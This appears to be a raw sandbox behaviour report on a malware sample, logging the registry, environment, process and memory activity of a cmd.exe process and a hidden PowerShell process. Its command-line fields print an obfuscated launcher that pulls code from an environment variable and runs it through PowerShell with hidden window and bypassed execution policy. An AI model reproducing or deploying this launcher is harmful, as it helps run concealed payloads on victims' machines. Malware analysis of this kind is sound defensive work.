Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 24, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE	1	Fn
Module	Get Filename	process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Environment	Get Environment String	name = PROMPT, result_out = $P$G	1	Fn
Environment	Get Environment String	name = COMSPEC, result_out = C:\Windows\system32\cmd.exe	1	Fn
Environment	Get Environment String	name = KEYS	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\Desktop, type = file_attributes	2	Fn
Environment	Set Environment String	name = =C:, value = C:\Users\aETAdzjz\Desktop	1	Fn
Environment	Get Environment String	-	1	Fn Data
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x77b20000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CopyFileExW, address_out = 0x77b323d0	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = IsDebuggerPresent, address_out = 0x77b28290	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x77b317e0	1	Fn
Environment	Get Environment String	name = adizY, result_out = EchO (gi vaRIAble:e*Xt).VaLuE.InvOkEComManD.INVOkesCRiPT((LS eNV:sULrV).vaLUe ) \|POwERsHElL -noNiNTEraCTI -NolO -wiN hIdden -execuTIONpOLIc byPASS -nOPrOFIle -COmMANd ^&( $eNV:ComsPec[4,24,25]-JoIn'')($inpuT )	1	Fn
Environment	Get Environment String	name = COMSPEC, result_out = C:\Windows\system32\cmd.exe	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Process	Create	process_name = C:\Windows\system32\cmd.exe, os_pid = 0xb54, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL	1	Fn
Environment	Set Environment String	name = COPYCMD	1	Fn
Environment	Get Environment String	-	1	Fn Data
File	Open	-	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Process	Create	process_name = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, os_pid = 0xb5c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL	1	Fn
Environment	Set Environment String	name = COPYCMD	1	Fn
Environment	Get Environment String	-	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn

Process #14: cmd.exe

50

0

»

Information	Value
ID	#14
File Name	c:\windows\system32\cmd.exe
Command Line	C:\Windows\system32\cmd.exe /S /D /c" EchO (gi vaRIAble:e*Xt).VaLuE.InvOkEComManD.INVOkesCRiPT((LS eNV:sULrV).vaLUe ) "
Initial Working Directory	C:\Users\aETAdzjz\Desktop\
Monitor	Start Time: 00:01:44, Reason: Child Process
Unmonitor	End Time: 00:01:45, Reason: Self Terminated
Monitor Duration	00:00:01

OS Process Information

»

Information	Value
PID	0xb54
Parent PID	0xb4c (c:\windows\system32\cmd.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x B58

Region

»

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x00045fff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
pagefile_0x0000000000020000	0x00020000	0x0002ffff	Pagefile Backed Memory	rw	-
pagefile_0x0000000000030000	0x00030000	0x00036fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000040000	0x00040000	0x00041fff	Pagefile Backed Memory	rw	-
private_0x0000000000050000	0x00050000	0x0014ffff	Private Memory	rw	-
pagefile_0x0000000000150000	0x00150000	0x00153fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000160000	0x00160000	0x00160fff	Pagefile Backed Memory	r	-
locale.nls	0x00170000	0x001d6fff	Memory Mapped File	r	-
private_0x00000000001e0000	0x001e0000	0x002dffff	Private Memory	rw	-
private_0x00000000002e0000	0x002e0000	0x002e0fff	Private Memory	rw	-
private_0x00000000002f0000	0x002f0000	0x002f0fff	Private Memory	rw	-
private_0x0000000000360000	0x00360000	0x0045ffff	Private Memory	rw	-
private_0x0000000000460000	0x00460000	0x0055ffff	Private Memory	rw	-
private_0x00000000005e0000	0x005e0000	0x005effff	Private Memory	rw	-
pagefile_0x00000000005f0000	0x005f0000	0x00777fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000780000	0x00780000	0x00900fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000910000	0x00910000	0x01d0ffff	Pagefile Backed Memory	r	-
pagefile_0x0000000001d10000	0x01d10000	0x02052fff	Pagefile Backed Memory	r	-
cmd.exe	0x4a0b0000	0x4a108fff	Memory Mapped File	rwx	-
user32.dll	0x77a20000	0x77b19fff	Memory Mapped File	rwx	-
kernel32.dll	0x77b20000	0x77c3efff	Memory Mapped File	rwx	-
ntdll.dll	0x77c40000	0x77de8fff	Memory Mapped File	rwx	-
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	r	-
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	r	-
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	r	-
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	r	-
winbrand.dll	0x7fef59a0000	0x7fef59a7fff	Memory Mapped File	rwx	-
kernelbase.dll	0x7fefdd60000	0x7fefddcafff	Memory Mapped File	rwx	-
gdi32.dll	0x7fefdf60000	0x7fefdfc6fff	Memory Mapped File	rwx	-
imm32.dll	0x7fefed60000	0x7fefed8dfff	Memory Mapped File	rwx	-
msctf.dll	0x7feff1e0000	0x7feff2e8fff	Memory Mapped File	rwx	-
usp10.dll	0x7feff4d0000	0x7feff598fff	Memory Mapped File	rwx	-
msvcrt.dll	0x7feff5a0000	0x7feff63efff	Memory Mapped File	rwx	-
lpk.dll	0x7feff860000	0x7feff86dfff	Memory Mapped File	rwx	-
apisetschema.dll	0x7fefff60000	0x7fefff60fff	Memory Mapped File	rwx	-
pagefile_0x000007fffffb0000	0x7fffffb0000	0x7fffffd2fff	Pagefile Backed Memory	r	-
private_0x000007fffffdd000	0x7fffffdd000	0x7fffffdefff	Private Memory	rw	-
private_0x000007fffffdf000	0x7fffffdf000	0x7fffffdffff	Private Memory	rw	-

Threads

Thread 0xb58

50

0

»

Category	Operation	Information	Count	Logfile
System	Get Time	type = System Time, time = 2018-11-06 10:24:16 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 141758	1	Fn
Module	Get Handle	module_name = c:\windows\system32\cmd.exe, base_address = 0x4a0b0000	1	Fn
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x77b20000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetThreadUILanguage, address_out = 0x77b36d40	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn
Environment	Get Environment String	-	2	Fn Data
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 24, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE	1	Fn
Module	Get Filename	process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Environment	Get Environment String	name = PROMPT, result_out = $P$G	1	Fn
Environment	Get Environment String	name = COMSPEC, result_out = C:\Windows\system32\cmd.exe	1	Fn
Environment	Get Environment String	name = KEYS	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\Desktop, type = file_attributes	2	Fn
Environment	Set Environment String	name = =C:, value = C:\Users\aETAdzjz\Desktop	1	Fn
Environment	Get Environment String	-	1	Fn Data
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x77b20000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CopyFileExW, address_out = 0x77b323d0	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = IsDebuggerPresent, address_out = 0x77b28290	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x77b317e0	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 79	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn

Process #15: powershell.exe

634

196

»

Information	Value
ID	#15
File Name	c:\windows\system32\windowspowershell\v1.0\powershell.exe
Command Line	POwERsHElL -noNiNTEraCTI -NolO -wiN hIdden -execuTIONpOLIc byPASS -nOPrOFIle -COmMANd &( $eNV:ComsPec[4,24,25]-JoIn'')($inpuT )
Initial Working Directory	C:\Users\aETAdzjz\Desktop\
Monitor	Start Time: 00:01:44, Reason: Child Process
Unmonitor	End Time: 00:02:06, Reason: Self Terminated
Monitor Duration	00:00:22

OS Process Information

»

Information	Value
PID	0xb5c
Parent PID	0xb4c (c:\windows\system32\cmd.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x B60 0x B70 0x B74 0x B7C 0x B94 0x B98 0x 780 0x 878 0x 14C 0x 410 0x 214 0x 28C 0x 508

Region

»

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x00045fff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
pagefile_0x0000000000020000	0x00020000	0x0002ffff	Pagefile Backed Memory	rw	-
pagefile_0x0000000000030000	0x00030000	0x00036fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000040000	0x00040000	0x00041fff	Pagefile Backed Memory	rw	-
pagefile_0x0000000000050000	0x00050000	0x00053fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000060000	0x00060000	0x00060fff	Pagefile Backed Memory	r	-
locale.nls	0x00070000	0x000d6fff	Memory Mapped File	r	-
powershell.exe.mui	0x000e0000	0x000e2fff	Memory Mapped File	rw	-
private_0x00000000000f0000	0x000f0000	0x000f0fff	Private Memory	rw	-
private_0x0000000000100000	0x00100000	0x00100fff	Private Memory	rw	-
pagefile_0x0000000000110000	0x00110000	0x00110fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000120000	0x00120000	0x00120fff	Pagefile Backed Memory	r	-
private_0x0000000000130000	0x00130000	0x001affff	Private Memory	rw	-
pagefile_0x00000000001b0000	0x001b0000	0x001b1fff	Pagefile Backed Memory	r	-
pagefile_0x00000000001c0000	0x001c0000	0x001c0fff	Pagefile Backed Memory	rw	-
pagefile_0x00000000001d0000	0x001d0000	0x001d1fff	Pagefile Backed Memory	r	-
cversions.1.db	0x001e0000	0x001e3fff	Memory Mapped File	r	-
cversions.2.db	0x001e0000	0x001e3fff	Memory Mapped File	r	-
pagefile_0x00000000001f0000	0x001f0000	0x001f0fff	Pagefile Backed Memory	rw	-
private_0x0000000000200000	0x00200000	0x0020ffff	Private Memory	rw	-
cversions.2.db	0x00210000	0x00213fff	Memory Mapped File	r	-
private_0x0000000000220000	0x00220000	0x0022ffff	Private Memory	rw	-
private_0x0000000000230000	0x00230000	0x002affff	Private Memory	rw	-
private_0x00000000002b0000	0x002b0000	0x003affff	Private Memory	rw	-
private_0x00000000003b0000	0x003b0000	0x004affff	Private Memory	rw	-
pagefile_0x00000000004b0000	0x004b0000	0x00637fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000640000	0x00640000	0x007c0fff	Pagefile Backed Memory	r	-
pagefile_0x00000000007d0000	0x007d0000	0x01bcffff	Pagefile Backed Memory	r	-
private_0x0000000001bd0000	0x01bd0000	0x01ccffff	Private Memory	rw	-
private_0x0000000001cd0000	0x01cd0000	0x01d4ffff	Private Memory	rw	-
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db	0x01d50000	0x01d6ffff	Memory Mapped File	r	-
private_0x0000000001d70000	0x01d70000	0x01deffff	Private Memory	rwx	-
pagefile_0x0000000001df0000	0x01df0000	0x01ecefff	Pagefile Backed Memory	r	-
sortdefault.nls	0x01ed0000	0x0219efff	Memory Mapped File	r	-
pagefile_0x00000000021a0000	0x021a0000	0x02592fff	Pagefile Backed Memory	r	-
{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000001c.db	0x025a0000	0x025cffff	Memory Mapped File	r	-
{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db	0x025d0000	0x02635fff	Memory Mapped File	r	-
pagefile_0x0000000002640000	0x02640000	0x02640fff	Pagefile Backed Memory	r	-
pagefile_0x0000000002650000	0x02650000	0x02652fff	Pagefile Backed Memory	rw	-
private_0x0000000002660000	0x02660000	0x026dffff	Private Memory	rw	-
pagefile_0x00000000026e0000	0x026e0000	0x026e0fff	Pagefile Backed Memory	rw	-
private_0x00000000026f0000	0x026f0000	0x026fffff	Private Memory	rw	-
private_0x0000000002700000	0x02700000	0x0271ffff	Private Memory	-	-
l_intl.nls	0x02720000	0x02722fff	Memory Mapped File	r	-
private_0x0000000002730000	0x02730000	0x027affff	Private Memory	rwx	-
private_0x00000000027b0000	0x027b0000	0x027b0fff	Private Memory	rw	-
private_0x00000000027c0000	0x027c0000	0x0283ffff	Private Memory	rw	-
private_0x0000000002840000	0x02840000	0x0293ffff	Private Memory	rw	-
kernelbase.dll.mui	0x02940000	0x029fffff	Memory Mapped File	rw	-
sorttbls.nlp	0x02a00000	0x02a04fff	Memory Mapped File	r	-
microsoft.wsman.runtime.dll	0x02a10000	0x02a17fff	Memory Mapped File	rwx	-
pagefile_0x0000000002a20000	0x02a20000	0x02a20fff	Pagefile Backed Memory	r	-
private_0x0000000002a30000	0x02a30000	0x02a3ffff	Private Memory	rw	-
private_0x0000000002a40000	0x02a40000	0x02b3ffff	Private Memory	rw	-
private_0x0000000002b40000	0x02b40000	0x02c40fff	Private Memory	rw	-
sortkey.nlp	0x02c50000	0x02c90fff	Memory Mapped File	r	-
private_0x0000000002ca0000	0x02ca0000	0x02d1ffff	Private Memory	rw	-
private_0x0000000002d20000	0x02d20000	0x1ad1ffff	Private Memory	rw	-
private_0x000000001ad20000	0x1ad20000	0x1b3effff	Private Memory	rw	-
private_0x000000001b3f0000	0x1b3f0000	0x1b46ffff	Private Memory	rw	-
system.management.automation.dll	0x1b470000	0x1b751fff	Memory Mapped File	rwx	-
pagefile_0x000000001b760000	0x1b760000	0x1b760fff	Pagefile Backed Memory	r	-
mscorrc.dll	0x1b760000	0x1b7b3fff	Memory Mapped File	r	-
system.transactions.dll	0x1e230000	0x1e278fff	Memory Mapped File	rwx	-
msvcr80.dll	0x756a0000	0x75768fff	Memory Mapped File	rwx	-
user32.dll	0x77a20000	0x77b19fff	Memory Mapped File	rwx	-
kernel32.dll	0x77b20000	0x77c3efff	Memory Mapped File	rwx	-
ntdll.dll	0x77c40000	0x77de8fff	Memory Mapped File	rwx	-
psapi.dll	0x77e00000	0x77e06fff	Memory Mapped File	rwx	-
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	r	-
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	r	-
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	r	-
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	r	-
powershell.exe	0x13fdf0000	0x13fe66fff	Memory Mapped File	rwx	-
culture.dll	0x642ff4a0000	0x642ff4a9fff	Memory Mapped File	rwx	-
system.directoryservices.ni.dll	0x7fee1030000	0x7fee11c4fff	Memory Mapped File	rwx	-
system.management.ni.dll	0x7fee11d0000	0x7fee133bfff	Memory Mapped File	rwx	-
system.xml.ni.dll	0x7fee1340000	0x7fee19e4fff	Memory Mapped File	rwx	-
microsoft.powershell.security.ni.dll	0x7fee1bf0000	0x7fee1c2dfff	Memory Mapped File	rwx	-
microsoft.powershell.commands.management.ni.dll	0x7fee1c30000	0x7fee1d47fff	Memory Mapped File	rwx	-
microsoft.powershell.commands.utility.ni.dll	0x7fee1d50000	0x7fee1f65fff	Memory Mapped File	rwx	-
system.transactions.ni.dll	0x7fee1f70000	0x7fee2054fff	Memory Mapped File	rwx	-
microsoft.wsman.management.ni.dll	0x7fee20f0000	0x7fee2199fff	Memory Mapped File	rwx	-
system.configuration.install.ni.dll	0x7fee21a0000	0x7fee21d1fff	Memory Mapped File	rwx	-
microsoft.powershell.commands.diagnostics.ni.dll	0x7fee21e0000	0x7fee2248fff	Memory Mapped File	rwx	-
system.core.ni.dll	0x7fee2250000	0x7fee257dfff	Memory Mapped File	rwx	-
system.management.automation.ni.dll	0x7fee2580000	0x7fee30dcfff	Memory Mapped File	rwx	-
microsoft.powershell.consolehost.ni.dll	0x7fee30e0000	0x7fee3191fff	Memory Mapped File	rwx	-
system.ni.dll	0x7fee31a0000	0x7fee3bc2fff	Memory Mapped File	rwx	-
mscorlib.ni.dll	0x7fee3bd0000	0x7fee4aabfff	Memory Mapped File	rwx	-
mscorwks.dll	0x7fee4ab0000	0x7fee544cfff	Memory Mapped File	rwx	-
shfolder.dll	0x7fee6a30000	0x7fee6a36fff	Memory Mapped File	rwx	-
mscoreei.dll	0x7fee9c80000	0x7fee9d18fff	Memory Mapped File	rwx	-
mscoree.dll	0x7fee9d20000	0x7fee9d8efff	Memory Mapped File	rwx	-
linkinfo.dll	0x7fef8e40000	0x7fef8e4bfff	Memory Mapped File	rwx	-
shdocvw.dll	0x7fef8e50000	0x7fef8e83fff	Memory Mapped File	rwx	-
ntshrui.dll	0x7fef9b40000	0x7fef9bbffff	Memory Mapped File	rwx	-
cscapi.dll	0x7fef9bc0000	0x7fef9bcefff	Memory Mapped File	rwx	-
apphelp.dll	0x7fefb340000	0x7fefb396fff	Memory Mapped File	rwx	-
slc.dll	0x7fefb730000	0x7fefb73afff	Memory Mapped File	rwx	-
atl.dll	0x7fefb760000	0x7fefb778fff	Memory Mapped File	rwx	-
ntmarta.dll	0x7fefbb00000	0x7fefbb2cfff	Memory Mapped File	rwx	-
uxtheme.dll	0x7fefc4b0000	0x7fefc505fff	Memory Mapped File	rwx	-
propsys.dll	0x7fefc510000	0x7fefc63bfff	Memory Mapped File	rwx	-
comctl32.dll	0x7fefc690000	0x7fefc883fff	Memory Mapped File	rwx	-
version.dll	0x7fefcd50000	0x7fefcd5bfff	Memory Mapped File	rwx	-
userenv.dll	0x7fefcf30000	0x7fefcf4dfff	Memory Mapped File	rwx	-
rsaenh.dll	0x7fefd180000	0x7fefd1c6fff	Memory Mapped File	rwx	-
cryptsp.dll	0x7fefd480000	0x7fefd496fff	Memory Mapped File	rwx	-
srvcli.dll	0x7fefd980000	0x7fefd9a2fff	Memory Mapped File	rwx	-
cryptbase.dll	0x7fefda80000	0x7fefda8efff	Memory Mapped File	rwx	-
profapi.dll	0x7fefdb90000	0x7fefdb9efff	Memory Mapped File	rwx	-
cfgmgr32.dll	0x7fefdce0000	0x7fefdd15fff	Memory Mapped File	rwx	-
kernelbase.dll	0x7fefdd60000	0x7fefddcafff	Memory Mapped File	rwx	-
devobj.dll	0x7fefddd0000	0x7fefdde9fff	Memory Mapped File	rwx	-
gdi32.dll	0x7fefdf60000	0x7fefdfc6fff	Memory Mapped File	rwx	-
shell32.dll	0x7fefdfd0000	0x7fefed57fff	Memory Mapped File	rwx	-
imm32.dll	0x7fefed60000	0x7fefed8dfff	Memory Mapped File	rwx	-
advapi32.dll	0x7feff0e0000	0x7feff1bafff	Memory Mapped File	rwx	-
sechost.dll	0x7feff1c0000	0x7feff1defff	Memory Mapped File	rwx	-
msctf.dll	0x7feff1e0000	0x7feff2e8fff	Memory Mapped File	rwx	-
setupapi.dll	0x7feff2f0000	0x7feff4c6fff	Memory Mapped File	rwx	-
usp10.dll	0x7feff4d0000	0x7feff598fff	Memory Mapped File	rwx	-
msvcrt.dll	0x7feff5a0000	0x7feff63efff	Memory Mapped File	rwx	-
shlwapi.dll	0x7feff640000	0x7feff6b0fff	Memory Mapped File	rwx	-
lpk.dll	0x7feff860000	0x7feff86dfff	Memory Mapped File	rwx	-
clbcatq.dll	0x7feff9a0000	0x7feffa38fff	Memory Mapped File	rwx	-
ole32.dll	0x7feffa40000	0x7feffc42fff	Memory Mapped File	rwx	-
rpcrt4.dll	0x7feffc50000	0x7feffd7cfff	Memory Mapped File	rwx	-
oleaut32.dll	0x7feffd80000	0x7feffe56fff	Memory Mapped File	rwx	-
wldap32.dll	0x7feffe60000	0x7feffeb1fff	Memory Mapped File	rwx	-
apisetschema.dll	0x7fefff60000	0x7fefff60fff	Memory Mapped File	rwx	-
private_0x000007ff00020000	0x7ff00020000	0x7ff0002ffff	Private Memory	-	-
private_0x000007ff00030000	0x7ff00030000	0x7ff0003ffff	Private Memory	-	-
private_0x000007ff00040000	0x7ff00040000	0x7ff000dffff	Private Memory	-	-
private_0x000007ff000e0000	0x7ff000e0000	0x7ff000effff	Private Memory	-	-
private_0x000007ff000f0000	0x7ff000f0000	0x7ff0015ffff	Private Memory	-	-
private_0x000007ff00160000	0x7ff00160000	0x7ff0016ffff	Private Memory	-	-
private_0x000007ff00170000	0x7ff00170000	0x7ff0017ffff	Private Memory	-	-
private_0x000007fffff10000	0x7fffff10000	0x7fffff1ffff	Private Memory	rwx	-
private_0x000007fffff20000	0x7fffff20000	0x7fffffaffff	Private Memory	rwx	-
pagefile_0x000007fffffb0000	0x7fffffb0000	0x7fffffd2fff	Pagefile Backed Memory	r	-
private_0x000007fffffd3000	0x7fffffd3000	0x7fffffd4fff	Private Memory	rw	-
private_0x000007fffffd5000	0x7fffffd5000	0x7fffffd6fff	Private Memory	rw	-
private_0x000007fffffd7000	0x7fffffd7000	0x7fffffd8fff	Private Memory	rw	-
private_0x000007fffffd9000	0x7fffffd9000	0x7fffffdafff	Private Memory	rw	-
private_0x000007fffffdb000	0x7fffffdb000	0x7fffffdcfff	Private Memory	rw	-
private_0x000007fffffdd000	0x7fffffdd000	0x7fffffdefff	Private Memory	rw	-
private_0x000007fffffdf000	0x7fffffdf000	0x7fffffdffff	Private Memory	rw	-
For performance reasons, the remaining 97 entries are omitted. The remaining entries can be found in flog.txt.

Threads

Thread 0xb60

454

0

»

Category	Operation	Information	Count	Logfile
System	Get Info	type = Operating System	3	Fn
File	Get Info	filename = C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll, type = file_attributes	1	Fn
User	Lookup Privilege	privilege = SeDebugPrivilege, luid = 20	1	Fn
Module	Get Filename	process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 2048	1	Fn
System	Get Info	type = SYSTEM_PROCESS_INFORMATION	1	Fn
Environment	Get Environment String	name = MshEnableTrace	3	Fn
